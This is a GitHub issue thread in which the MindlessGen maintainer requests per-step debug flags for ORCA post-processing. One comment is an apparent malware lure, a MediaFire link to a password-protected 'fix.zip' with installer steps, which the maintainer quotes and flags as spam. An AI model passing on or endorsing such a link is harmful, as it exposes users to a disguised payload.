### ISSUE TITLE
Better debug functionality for post-processing steps down the road

### ISSUE THREAD

**Issue by marcelmbn** [grimme-lab/MindlessGen#13]
Currently, it's not possible to debug the ORCA post-processing part appropriately since this might be visible only after several hundred trials. -> Increasing the verbosity level is not a good option.

## What we want to have

- Debug flag for each step
- Example: `debug_orca`: All `xtb` iterations are not printed and conducted in parallel, but if a single molecule enters the post-processing step, the verbosity is increased and the calculation stopped (if desired).

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marcelmbn** [comment]
> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Probably spam. Avoid clicking on the link, please.
